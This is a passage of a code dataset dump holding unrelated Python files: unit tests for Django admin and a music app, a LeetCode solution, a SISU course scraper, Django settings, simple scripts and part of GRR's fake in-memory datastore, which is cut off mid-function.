id
stringlengths
1
7
text
stringlengths
6
1.03M
dataset_id
stringclasses
1 value
1690712
<filename>tests/domain/test_Track_group.py import pytest from tloen.domain import Application, Track @pytest.mark.asyncio async def test_1(): track_a = Track() track_b = Track() group_track = await Track.group([track_a, track_b]) assert isinstance(group_track, Track) assert list(group_track.tracks) == [track_a, track_b] assert group_track.application is track_a.application assert group_track.channel_count is None assert group_track.name is None assert group_track.parent is None assert group_track.provider is track_a.provider assert not group_track.is_cued assert not group_track.is_muted assert not group_track.is_soloed assert track_a.parent is group_track.tracks assert track_b.parent is group_track.tracks @pytest.mark.asyncio async def test_2(): application = Application() context = await application.add_context() track_a = await context.add_track() track_b = await context.add_track() track_c = await context.add_track() group_track = await Track.group([track_b, track_c]) assert list(context.tracks) == [track_a, group_track] assert list(group_track.tracks) == [track_b, track_c] assert group_track.application is application assert group_track.parent is context.tracks assert group_track.provider is context.provider assert track_b.provider is context.provider assert track_c.provider is context.provider @pytest.mark.asyncio async def test_3(): application = Application() context = await application.add_context() track_a = await context.add_track() track_b = await context.add_track() track_c = await context.add_track() await application.boot() group_track = await Track.group([track_b, track_c]) assert list(context.tracks) == [track_a, group_track] assert list(group_track.tracks) == [track_b, track_c] assert group_track.application is application assert group_track.parent is context.tracks assert group_track.provider is context.provider assert track_b.provider is context.provider assert track_c.provider is context.provider
StarcoderdataPython
3216377
<reponame>rowanv/django-blog-zinnia # coding=utf-8 """Test cases for Zinnia's admin""" from __future__ import unicode_literals from django.contrib.admin.sites import AdminSite from django.contrib.auth.models import User from django.contrib.sites.models import Site from django.test import RequestFactory from django.test import TestCase from django.utils import timezone from django.utils.translation import activate from django.utils.translation import deactivate from zinnia import settings from zinnia.admin import entry as entry_admin from zinnia.admin.category import CategoryAdmin from zinnia.admin.entry import EntryAdmin from zinnia.managers import PUBLISHED from zinnia.models.author import Author from zinnia.models.category import Category from zinnia.models.entry import Entry from zinnia.signals import disconnect_entry_signals from zinnia.tests.utils import datetime from zinnia.tests.utils import skip_if_custom_user from zinnia.url_shortener.backends.default import base36 class BaseAdminTestCase(TestCase): rich_urls = 'zinnia.tests.implementations.urls.default' poor_urls = 'zinnia.tests.implementations.urls.poor' model_class = None admin_class = None def setUp(self): disconnect_entry_signals() activate('en') self.site = AdminSite() self.admin = self.admin_class( self.model_class, self.site) def tearDown(self): """ Deactivate the translation system. """ deactivate() def check_with_rich_and_poor_urls(self, func, args, result_rich, result_poor): with self.settings(ROOT_URLCONF=self.rich_urls): self.assertEqual(func(*args), result_rich) with self.settings(ROOT_URLCONF=self.poor_urls): self.assertEqual(func(*args), result_poor) class TestMessageBackend(object): """Message backend for testing""" def __init__(self, *ka, **kw): self.messages = [] def add(self, *ka, **kw): self.messages.append(ka) @skip_if_custom_user class EntryAdminTestCase(BaseAdminTestCase): """Test case for Entry Admin""" model_class = Entry admin_class = EntryAdmin def setUp(self): super(EntryAdminTestCase, self).setUp() params = {'title': 'My title', 'content': 'My content', 'slug': 'my-title'} self.entry = Entry.objects.create(**params) self.request_factory = RequestFactory() self.request = self.request_factory.get('/') def test_get_title(self): self.assertEqual(self.admin.get_title(self.entry), 'My title (2 words)') self.entry.comment_count = 1 self.entry.save() self.entry = Entry.objects.get(pk=self.entry.pk) self.assertEqual(self.admin.get_title(self.entry), 'My title (2 words) (1 reaction)') self.entry.pingback_count = 1 self.entry.save() self.entry = Entry.objects.get(pk=self.entry.pk) self.assertEqual(self.admin.get_title(self.entry), 'My title (2 words) (2 reactions)') def test_get_authors(self): self.check_with_rich_and_poor_urls( self.admin.get_authors, (self.entry,), '', '') author_1 = Author.objects.create_user( 'author-1', '<EMAIL>') author_2 = Author.objects.create_user( 'author<2>', '<EMAIL>') self.entry.authors.add(author_1) self.check_with_rich_and_poor_urls( self.admin.get_authors, (self.entry,), '<a href="/authors/author-1/" target="blank">author-1</a>', 'author-1') self.entry.authors.add(author_2) self.check_with_rich_and_poor_urls( self.admin.get_authors, (self.entry,), '<a href="/authors/author-1/" target="blank">author-1</a>, ' '<a href="/authors/author%3C2%3E/" target="blank">' 'author&lt;2&gt;</a>', 'author-1, author&lt;2&gt;') def test_get_authors_non_ascii(self): author = Author.objects.create_user( 'тест', '<EMAIL>') self.entry.authors.add(author) self.check_with_rich_and_poor_urls( self.admin.get_authors, (self.entry,), '<a href="/authors/%D1%82%D0%B5%D1%81%D1%82/" ' 'target="blank">тест</a>', 'тест') def test_get_categories(self): self.check_with_rich_and_poor_urls( self.admin.get_categories, (self.entry,), '', '') category_1 = Category.objects.create(title='Category <b>1</b>', slug='category-1') category_2 = Category.objects.create(title='Category <b>2</b>', slug='category-2') self.entry.categories.add(category_1) self.check_with_rich_and_poor_urls( self.admin.get_categories, (self.entry,), '<a href="/categories/category-1/" target="blank">' 'Category &lt;b&gt;1&lt;/b&gt;</a>', 'Category &lt;b&gt;1&lt;/b&gt;') self.entry.categories.add(category_2) self.check_with_rich_and_poor_urls( self.admin.get_categories, (self.entry,), '<a href="/categories/category-1/" target="blank">' 'Category &lt;b&gt;1&lt;/b&gt;</a>, ' '<a href="/categories/category-2/" target="blank">Category ' '&lt;b&gt;2&lt;/b&gt;</a>', 'Category &lt;b&gt;1&lt;/b&gt;, Category &lt;b&gt;2&lt;/b&gt;') def test_get_categories_non_ascii(self): category = Category.objects.create(title='Category тест', slug='category') self.entry.categories.add(category) self.check_with_rich_and_poor_urls( self.admin.get_categories, (self.entry,), '<a href="/categories/category/" target="blank">' 'Category тест</a>', 'Category тест') def test_get_tags(self): self.check_with_rich_and_poor_urls( self.admin.get_tags, (self.entry,), '', '') self.entry.tags = 'zinnia' self.check_with_rich_and_poor_urls( self.admin.get_tags, (self.entry,), '<a href="/tags/zinnia/" target="blank">zinnia</a>', 'zinnia') self.entry.tags = 'zinnia, t<e>st' self.check_with_rich_and_poor_urls( self.admin.get_tags, (self.entry,), '<a href="/tags/t%3Ce%3Est/" target="blank">t&lt;e&gt;st</a>, ' '<a href="/tags/zinnia/" target="blank">zinnia</a>', 'zinnia, t&lt;e&gt;st') # Yes, this is not the same order... def test_get_tags_non_ascii(self): self.entry.tags = 'тест' self.check_with_rich_and_poor_urls( self.admin.get_tags, (self.entry,), '<a href="/tags/%D1%82%D0%B5%D1%81%D1%82/" ' 'target="blank">тест</a>', 'тест') def test_get_sites(self): self.assertEqual(self.admin.get_sites(self.entry), '') self.entry.sites.add(Site.objects.get_current()) self.check_with_rich_and_poor_urls( self.admin.get_sites, (self.entry,), '<a href="http://example.com/" target="blank">example.com</a>', '<a href="http://example.com" target="blank">example.com</a>') def test_get_short_url(self): with self.settings(ROOT_URLCONF=self.poor_urls): entry_url = self.entry.get_absolute_url() self.check_with_rich_and_poor_urls( self.admin.get_short_url, (self.entry,), '<a href="http://example.com/%(hash)s/" target="blank">' 'http://example.com/%(hash)s/</a>' % { 'hash': base36(self.entry.pk)}, '<a href="%(url)s" target="blank">%(url)s</a>' % { 'url': entry_url}) def test_get_is_visible(self): self.assertEqual(self.admin.get_is_visible(self.entry), self.entry.is_visible) def test_queryset(self): user = Author.objects.create_user( 'user', '<EMAIL>') self.entry.authors.add(user) root = Author.objects.create_superuser( 'root', '<EMAIL>', 'toor') params = {'title': 'My root title', 'content': 'My root content', 'slug': 'my-root-titile'} root_entry = Entry.objects.create(**params) root_entry.authors.add(root) self.request.user = User.objects.get(pk=user.pk) self.assertEqual(len(self.admin.get_queryset(self.request)), 1) self.request.user = User.objects.get(pk=root.pk) self.assertEqual(len(self.admin.get_queryset(self.request)), 2) def test_get_changeform_initial_data(self): user = User.objects.create_user( 'user', '<EMAIL>') site = Site.objects.get_current() self.request.user = user data = self.admin.get_changeform_initial_data(self.request) self.assertEqual(data, {'authors': [user.pk], 'sites': [site.pk]}) request = self.request_factory.get('/?title=data') request.user = user data = self.admin.get_changeform_initial_data(request) self.assertEqual(data, {'title': 'data'}) def test_formfield_for_manytomany(self): staff = User.objects.create_user( 'staff', '<EMAIL>') author = User.objects.create_user( 'author', '<EMAIL>') root = User.objects.create_superuser( 'root', '<EMAIL>', 'toor') self.request.user = root field = self.admin.formfield_for_manytomany( Entry.authors.field, self.request) self.assertEqual(field.queryset.count(), 1) staff.is_staff = True staff.save() field = self.admin.formfield_for_manytomany( Entry.authors.field, self.request) self.assertEqual(field.queryset.count(), 2) self.entry.authors.add(Author.objects.get(pk=author.pk)) field = self.admin.formfield_for_manytomany( Entry.authors.field, self.request) self.assertEqual(field.queryset.count(), 3) def test_get_readonly_fields(self): user = User.objects.create_user( 'user', '<EMAIL>') root = User.objects.create_superuser( 'root', '<EMAIL>', 'toor') self.request.user = user self.assertEqual(self.admin.get_readonly_fields(self.request), ['status', 'authors']) self.request.user = root self.assertEqual(self.admin.get_readonly_fields(self.request), []) def test_get_actions(self): original_ping_directories = settings.PING_DIRECTORIES user = User.objects.create_user( 'user', '<EMAIL>') root = User.objects.create_superuser( 'root', '<EMAIL>', 'toor') self.request.user = user settings.PING_DIRECTORIES = True self.assertEqual( list(self.admin.get_actions(self.request).keys()), ['delete_selected', 'close_comments', 'close_pingbacks', 'close_trackbacks', 'ping_directories', 'put_on_top', 'mark_featured', 'unmark_featured']) settings.PING_DIRECTORIES = False self.assertEqual( list(self.admin.get_actions(self.request).keys()), ['delete_selected', 'close_comments', 'close_pingbacks', 'close_trackbacks', 'put_on_top', 'mark_featured', 'unmark_featured']) self.request.user = root self.assertEqual( list(self.admin.get_actions(self.request).keys()), ['delete_selected', 'make_mine', 'make_published', 'make_hidden', 'close_comments', 'close_pingbacks', 'close_trackbacks', 'put_on_top', 'mark_featured', 'unmark_featured']) settings.PING_DIRECTORIES = original_ping_directories def test_get_actions_in_popup_mode_issue_291(self): user = User.objects.create_user( 'user', '<EMAIL>') request = self.request_factory.get('/?_popup=1') request.user = user self.assertEqual( list(self.admin.get_actions(request).keys()), []) def test_make_mine(self): user = Author.objects.create_user( 'user', '<EMAIL>') self.request.user = User.objects.get(pk=user.pk) self.request._messages = TestMessageBackend() self.assertEqual(user.entries.count(), 0) self.admin.make_mine(self.request, Entry.objects.all()) self.assertEqual(user.entries.count(), 1) self.assertEqual(len(self.request._messages.messages), 1) def test_make_published(self): original_ping_directories = settings.PING_DIRECTORIES settings.PING_DIRECTORIES = [] self.request._messages = TestMessageBackend() self.entry.sites.add(Site.objects.get_current()) self.assertEqual(Entry.published.count(), 0) self.admin.make_published(self.request, Entry.objects.all()) self.assertEqual(Entry.published.count(), 1) self.assertEqual(len(self.request._messages.messages), 1) settings.PING_DIRECTORIES = original_ping_directories def test_make_hidden(self): self.request._messages = TestMessageBackend() self.entry.status = PUBLISHED self.entry.save() self.entry.sites.add(Site.objects.get_current()) self.assertEqual(Entry.published.count(), 1) self.admin.make_hidden(self.request, Entry.objects.all()) self.assertEqual(Entry.published.count(), 0) self.assertEqual(len(self.request._messages.messages), 1) def test_close_comments(self): self.request._messages = TestMessageBackend() self.assertEqual(Entry.objects.filter( comment_enabled=True).count(), 1) self.admin.close_comments(self.request, Entry.objects.all()) self.assertEqual(Entry.objects.filter( comment_enabled=True).count(), 0) self.assertEqual(len(self.request._messages.messages), 1) def test_close_pingbacks(self): self.request._messages = TestMessageBackend() self.assertEqual(Entry.objects.filter( pingback_enabled=True).count(), 1) self.admin.close_pingbacks(self.request, Entry.objects.all()) self.assertEqual(Entry.objects.filter( pingback_enabled=True).count(), 0) self.assertEqual(len(self.request._messages.messages), 1) def test_close_trackbacks(self): self.request._messages = TestMessageBackend() self.assertEqual(Entry.objects.filter( trackback_enabled=True).count(), 1) self.admin.close_trackbacks(self.request, Entry.objects.all()) self.assertEqual(Entry.objects.filter( trackback_enabled=True).count(), 0) self.assertEqual(len(self.request._messages.messages), 1) def test_put_on_top(self): original_ping_directories = settings.PING_DIRECTORIES settings.PING_DIRECTORIES = [] self.request._messages = TestMessageBackend() self.entry.publication_date = datetime(2011, 1, 1, 12, 0) self.admin.put_on_top(self.request, Entry.objects.all()) self.assertEqual( Entry.objects.get(pk=self.entry.pk).creation_date.date(), timezone.now().date()) self.assertEqual(len(self.request._messages.messages), 1) settings.PING_DIRECTORIES = original_ping_directories def test_mark_unmark_featured(self): self.request._messages = TestMessageBackend() self.assertEqual(Entry.objects.filter( featured=True).count(), 0) self.admin.mark_featured(self.request, Entry.objects.all()) self.assertEqual(Entry.objects.filter(featured=True).count(), 1) self.assertEqual(len(self.request._messages.messages), 1) self.admin.unmark_featured(self.request, Entry.objects.all()) self.assertEqual(Entry.objects.filter(featured=True).count(), 0) self.assertEqual(len(self.request._messages.messages), 2) def test_ping_directories(self): class FakePinger(object): def __init__(self, *ka, **kw): self.results = [{'flerror': False, 'message': 'OK'}, {'flerror': True, 'message': 'KO'}] def join(self): pass original_pinger = entry_admin.DirectoryPinger entry_admin.DirectoryPinger = FakePinger original_ping_directories = settings.PING_DIRECTORIES settings.PING_DIRECTORIES = ['http://ping.com/ping'] self.request._messages = TestMessageBackend() self.admin.ping_directories(self.request, Entry.objects.all(), False) self.assertEqual(len(self.request._messages.messages), 0) self.admin.ping_directories(self.request, Entry.objects.all()) self.assertEqual(len(self.request._messages.messages), 2) self.assertEqual(self.request._messages.messages, [(20, 'http://ping.com/ping : KO', ''), (20, 'http://ping.com/ping directory succesfully ' 'pinged 1 entries.', '')]) entry_admin.DirectoryPinger = original_pinger settings.PING_DIRECTORIES = original_ping_directories class CategoryAdminTestCase(BaseAdminTestCase): """Test cases for Category Admin""" model_class = Category admin_class = CategoryAdmin def test_get_tree_path(self): category = Category.objects.create(title='Category', slug='cat') self.check_with_rich_and_poor_urls( self.admin.get_tree_path, (category,), '<a href="/categories/cat/" target="blank">/cat/</a>', '/cat/')
StarcoderdataPython
4840930
<gh_stars>1-10 ''' Given an array of integers nums and an integer k, return the total number of continuous subarrays whose sum equals to k. Example 1: Input: nums = [1,1,1], k = 2 Output: 2 Example 2: Input: nums = [1,2,3], k = 3 Output: 2 Constraints: 1 <= nums.length <= 2 * 10^4 -1000 <= nums[i] <= 1000 -10^7 <= k <= 10^7 ''' class Solution: def subarraySum(self, nums: List[int], k: int) -> int: sumCount = {} count = 0 sumValue = 0 for i in nums: sumValue = sumValue+i if sumValue == k: count = count + 1 if (sumValue - k) in sumCount.keys(): count = count + sumCount[sumValue-k] if sumValue in sumCount.keys(): sumCount[sumValue] = sumCount[sumValue] + 1 else: sumCount[sumValue] = 1 return count
StarcoderdataPython
21207
import json from PIL import Image with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.7.json') as f: val_1_7 = json.load(f) with open('sl4_side_val_1.7/results.json') as f: new_1_8 = json.load(f) ROOT = '/home/tianpei.qian/workspace/data_local/sl4_front_1.0/' for old, new in zip(val_1_7, new_1_8): assert old['file'] == new['file'] im = Image.open(ROOT + old['file']) im_width, im_height = im.size for box in new['detections']: new_box = {} x_min, x_max, y_min, y_max = box['x_min'], box['x_max'], box['y_min'], box['y_max'] width, height = x_max - x_min, y_max - y_min new_box['coord'] = [(x_min + x_max) / 2 / im_width, (y_min + y_max) / 2 / im_height, width / im_width, height / im_height] new_box['meta'] = {'isfrontcar': False} new_box['class'] = box['kind'] new_box['occluded'] = 'none' new_box['score'] = box['score'] old['boxes'].append(new_box) with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.8.json', 'w') as f: json.dump(val_1_7, f)
StarcoderdataPython
3323920
<gh_stars>1-10 import requests import csv from time import time baseURL = "https://sisu-api.apps.mec.gov.br/api/v1/oferta/" filename = "all_courses" t0 = time() print("Will write to file '{}.csv'.".format(filename)) csvFile = open(filename + ".csv", "w+", encoding="UTF-8") csvFileWriter = csv.writer(csvFile, delimiter=";", quotechar="\"", quoting=csv.QUOTE_ALL, lineterminator="\n") response = requests.get(baseURL+"instituicoes").json() instituicoes = [r["co_ies"] for r in response] ofertas = [] for i, instituicao in enumerate(instituicoes): print("[{:>3}/{}] Scanning ID #{}...".format(i+1, len(instituicoes), instituicao)) response = requests.get(baseURL+"instituicao/"+instituicao).json() for i in range(len(response)-1): r = response[str(i)] codigo = r["co_oferta"] cursoNome = r["no_curso"] cursoGrau = r["no_grau"] cursoTurno = r["no_turno"] vagasTotais = r["qt_vagas_sem1"] campusNome = r["no_campus"] campusCidade = r["no_municipio_campus"] campusUF = r["sg_uf_campus"] iesNome = r["no_ies"] iesSG = r["sg_ies"] oferta = (campusUF, iesNome, iesSG, campusCidade, campusNome, cursoNome, cursoGrau, cursoTurno, vagasTotais, codigo) ofertas.append(oferta) ofertas = sorted(ofertas) # Write to .csv for oferta in ofertas: csvFileWriter.writerow(tuple(oferta)) print("Written {} courses to '{}.csv' in {:.1f}s.".format(len(ofertas), filename, time()-t0))
StarcoderdataPython
1615469
import os PROJECT_PATH = os.path.abspath(os.getcwd()) DEBUG = False TEMPLATE_DEBUG = DEBUG ADMINS = ( ('<NAME>', '<EMAIL>'), ('<NAME>', '<EMAIL>'), ) MANAGERS = ADMINS ALLOWED_HOSTS = [ '127.0.0.1', ] TIME_ZONE = 'Europe/Istanbul' LANGUAGE_CODE = 'TR-tr' SITE_ID = 1 USE_I18N = True USE_L10N = True USE_TZ = True MEDIA_ROOT = '' MEDIA_URL = '' STATIC_ROOT = '{:s}/static/'.format(PROJECT_PATH) STATIC_URL = '/static/' STATICFILES_DIRS = ( '{:s}/static_files/'.format(PROJECT_PATH), ) STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) SECRET_KEY = '#1f*6@=e@*7t1yk_!gef=jn!pc5#mv_%)=8__y8*gi0&0t7=u(' TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ) MIDDLEWARE = ( 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', # 'djangospam.cookie.middleware.SpamCookieMiddleware', 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware', ) TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(PROJECT_PATH, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] ROOT_URLCONF = 'pyist.urls' WSGI_APPLICATION = 'pyist.wsgi.application' INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.messages', 'django.contrib.staticfiles', 'django.contrib.admin', 'django.contrib.flatpages', 'django.contrib.sitemaps', 'django_gravatar', 'markitup', 'nose', 'people', 'presentations', 'blog', ) LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } } # Database Settings DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': '{:s}/data/db.sqlite'.format(PROJECT_PATH), 'USER': '', 'PASSWORD': '', 'HOST': '', 'PORT': '', } } # Markitup Settings MARKITUP_SET = 'markitup/sets/markdown' MARKITUP_FILTER = ('markdown.markdown', {'safe_mode': False}) # Blog Settings BLOG = { 'TITLE': 'Python İstanbul', 'DESCRIPTION': 'Python İstanbul Günlüğü', 'LIMIT': 5, 'URL': 'http://pyistanbul.org/', 'DISQUS_USERNAME': 'pyistanbul', 'USE_DISQUS': False, } # Djangospam Settings # DJANGOSPAM_COOKIE_KEY = 'argumentclinic' # DJANGOSPAM_LOG = 'spam.log' # Nose Settings TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
StarcoderdataPython
3379840
import math def older(person): print() print('Person ', person, ' is older') def main(): # compiling the bday for person 1 print('please input birthday of 1st person') p1_year = int(input('\tyear: ')) * math.pow(10, 4) p1_month = 0 while p1_month > 12 or p1_month == 0: p1_month = int(input('\tmonth: ')) p1_month *= math.pow(10,2) p1_day = 0 while p1_day > 31 or p1_day ==0: p1_day = int(input('\tday: ')) # compiling the bday for person 2 print('please input birthday of 2nd person') p2_year = int(input('\tyear: ')) * math.pow(10,4) p2_month = 0 while p2_month > 12 or p2_month == 0: p2_month = int(input('\tmonth: ')) p2_month *= math.pow(10,2) p2_day = 0 while p2_day > 31 or p2_day == 0: p2_day = int(input('\tday: ')) # summing up each's birthday p1_bday = p1_year + p1_month + p1_day p2_bday = p2_year + p2_month + p2_day if (p1_bday == p2_bday): print('they have the same birthday') elif (p1_bday < p2_bday): older(1) else: older(2) print() while 1: main()
StarcoderdataPython
6814
<reponame>sbarguil/Testing-framework<filename>AutomationFramework/tests/interfaces/test_if_subif.py import pytest from AutomationFramework.page_objects.interfaces.interfaces import Interfaces from AutomationFramework.tests.base_test import BaseTest class TestInterfacesSubInterfaces(BaseTest): test_case_file = 'if_subif.yml' @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_description', 'page_object_class': Interfaces}]) def test_if_subif_description(self, create_page_object): create_page_object.execute_generic_interfaces_edit_config_test_case() assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description() @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_enabled', 'page_object_class': Interfaces}]) def test_if_subif_enabled(self, create_page_object): create_page_object.execute_generic_interfaces_edit_config_test_case() assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description() @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_ip_prefix_length', 'page_object_class': Interfaces}]) def test_if_subif_ip_prefix_length(self, create_page_object): create_page_object.execute_generic_interfaces_edit_config_test_case() assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description() @pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_ip_state', 'page_object_rpcs_classes': [Interfaces, Interfaces], 'rpc_clean_order': None, }]) def test_if_subif_ip_state(self, multiple_create_page_objects): for page_object in multiple_create_page_objects: page_object.execute_interface_rpc() assert page_object.validate_rpc(), page_object.get_test_case_description() @pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_origin', 'page_object_rpcs_classes': [Interfaces, Interfaces], 'rpc_clean_order': None, }]) def test_if_subif_origin(self, multiple_create_page_objects): for page_object in multiple_create_page_objects: page_object.execute_interface_rpc() assert page_object.validate_rpc(), page_object.get_test_case_description() @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_dhcp_client', 'page_object_class': Interfaces}]) def test_if_subif_dhcp_client(self, create_page_object): create_page_object.execute_generic_interfaces_edit_config_test_case() assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description() @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_mtu', 'page_object_class': Interfaces}]) def test_if_subif_mtu(self, create_page_object): create_page_object.execute_generic_interfaces_edit_config_test_case() assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description() @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_vlan_id', 'page_object_class': Interfaces}]) def test_if_subif_vlan_id(self, create_page_object): create_page_object.execute_generic_interfaces_edit_config_test_case() assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description() @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_inner_outer_vlan_id', 'page_object_class': Interfaces}]) def test_if_subif_inner_outer_vlan_id(self, create_page_object): create_page_object.execute_generic_interfaces_edit_config_test_case() assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description() @pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file, 'test_case_name': 'if_subif_match_vlan_id', 'page_object_class': Interfaces}]) def test_if_subif_match_vlan_id(self, create_page_object): create_page_object.execute_generic_interfaces_edit_config_test_case() assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
StarcoderdataPython
3392633
<filename>pettygram/views.py #django from django.http import HttpResponse #utilities from datetime import datetime import json def hello_world(request): return HttpResponse("oh, hi! , Current server time is {now}".format( now= datetime.now().strftime('%b %dth, %y - %H:%M hrs') )) def sorted_integers(request): #return a json response with sorted integers numbers = [int (i) for i in request.GET['numbers'].split(',')] sorted_ints = sorted(numbers) #data que será mostrada data = { 'status' : 'ok', 'numbers': sorted_ints, 'message': 'Integer sorted succesfully' } return HttpResponse( json.dumps(data), content_type='application/json' ) def say_hi(request, name, age): """"Return a greeting""" if age < 12: message = 'Sorry {}, you not allowed here'.format(name) else: message = 'Hello, welcome to pettygram'.format(name) return HttpResponse(message)
StarcoderdataPython
120688
# Testing serial ports # https://faradayrf.com/unit-testing-pyserial-code/ # Import modules import serial class SerialTestClass(object): """A mock serial port test class""" def __init__(self): """Creates a mock serial port which is a loopback object""" self.device = "test" self._port = "loop://" self._timeout = 0 self._baudrate = 115200 self.serialPort = \ serial.serial_for_url(url=self._port, timeout=self._timeout, baudrate=self._baudrate) def __enter__(self, *args, **kwargs): pass def __exit__(self, *args, **kwargs): pass def open(self, *args, **kwargs): pass def close(self, *args, **kwargs): pass def read(self, command): pass def write(self, command): pass
StarcoderdataPython
3343552
#!/usr/bin/env python """An implementation of an in-memory data store for testing.""" from __future__ import print_function import sys import threading import time from future.utils import iteritems from grr_response_core.lib import rdfvalue from grr_response_core.lib import utils from grr_response_server import aff4 from grr_response_server import data_store class FakeDBSubjectLock(data_store.DBSubjectLock): """A fake transaction object for testing.""" def _Acquire(self, lease_time): self.expires = int((time.time() + lease_time) * 1e6) with self.store.lock: expires = self.store.transactions.get(self.subject) if expires and (time.time() * 1e6) < expires: raise data_store.DBSubjectLockError("Subject is locked") self.store.transactions[self.subject] = self.expires self.locked = True def UpdateLease(self, duration): self.expires = int((time.time() + duration) * 1e6) self.store.transactions[self.subject] = self.expires def Release(self): with self.store.lock: if self.locked: self.store.transactions.pop(self.subject, None) self.locked = False class FakeDataStore(data_store.DataStore): """A fake data store - Everything is in memory.""" def __init__(self): super(FakeDataStore, self).__init__() self.subjects = {} # All access to the store must hold this lock. self.lock = threading.RLock() # The set of all transactions in flight. self.transactions = {} self._value_converter = aff4.ValueConverter() @utils.Synchronized def DeleteSubject(self, subject, sync=False): _ = sync subject = utils.SmartUnicode(subject) try: del self.subjects[subject] except KeyError: pass @utils.Synchronized def ClearTestDB(self): self.subjects = {} def DBSubjectLock(self, subject, lease_time=None): return FakeDBSubjectLock(self, subject, lease_time=lease_time) @utils.Synchronized def Set(self, subject, attribute, value, timestamp=None, replace=True, sync=True): """Set the value into the data store.""" subject = utils.SmartUnicode(subject) _ = sync attribute = utils.SmartUnicode(attribute) if timestamp is None or timestamp == self.NEWEST_TIMESTAMP: timestamp = time.time() * 1000000 if subject not in self.subjects: self.subjects[subject] = {} if replace or attribute not in self.subjects[subject]: self.subjects[subject][attribute] = [] encoded_value = self._value_converter.Encode(attribute, value) self.subjects[subject][attribute].append([encoded_value, int(timestamp)]) self.subjects[subject][attribute].sort(key=lambda x: x[1]) @utils.Synchronized def MultiSet(self, subject, values, timestamp=None, replace=True, sync=True, to_delete=None): subject = utils.SmartUnicode(subject) if to_delete: self.DeleteAttributes(subject, to_delete, sync=sync) for k, seq in iteritems(values): for v in seq: if isinstance(v, (list, tuple)): v, element_timestamp = v else: element_timestamp = timestamp self.Set( subject, k, v, timestamp=element_timestamp, replace=replace, sync=sync) @utils.Synchronized def DeleteAttributes(self, subject, attributes, start=None, end=None, sync=None): _ = sync # Unimplemented. if isinstance(attributes, basestring): raise ValueError( "String passed to DeleteAttributes (non string iterable expected).") subject = utils.SmartUnicode(subject) try: record = self.subjects[subject] keys_to_delete = [] for name, values in iteritems(record): if name not in attributes: continue start = start or 0 if end is None: end = (2**63) - 1 # sys.maxsize new_values = [] for value, timestamp in values: if not start <= timestamp <= end: new_values.append((value, int(timestamp))) if new_values: record[name] = new_values else: keys_to_delete.append(name) for key in keys_to_delete: record.pop(key) except KeyError: pass @utils.Synchronized def ScanAttributes(self, subject_prefix, attributes, after_urn="", max_records=None, relaxed_order=False): subject_prefix = utils.SmartStr(rdfvalue.RDFURN(subject_prefix)) if subject_prefix[-1] != "/": subject_prefix += "/" if after_urn: after_urn = utils.SmartUnicode(after_urn) subjects = [] for s in self.subjects: if s.startswith(subject_prefix) and s > after_urn: subjects.append(s) subjects.sort() return_count = 0 for s in subjects: if max_records and return_count >= max_records: break r = self.subjects[s] results = {} for attribute in attributes: attribute_list = r.get(attribute) if attribute_list: encoded_value, timestamp = attribute_list[-1] value = self._value_converter.Decode(attribute, encoded_value) results[attribute] = (timestamp, value) if results: return_count += 1 yield (s, results) @utils.Synchronized def ResolveMulti(self, subject, attributes, timestamp=None, limit=None): subject = utils.SmartUnicode(subject) # Does timestamp represent a range? if isinstance(timestamp, (list, tuple)): start, end = timestamp # pylint: disable=unpacking-non-sequence else: start, end = -1, 1 << 65 start = int(start) end = int(end) if isinstance(attributes, str): attributes = [attributes] try: record = self.subjects[subject] except KeyError: return # Holds all the attributes which matched. Keys are attribute names, values # are lists of timestamped data. results = {} for attribute in attributes: for attr, values in iteritems(record): if attr == attribute: for encoded_value, ts in values: results_list = 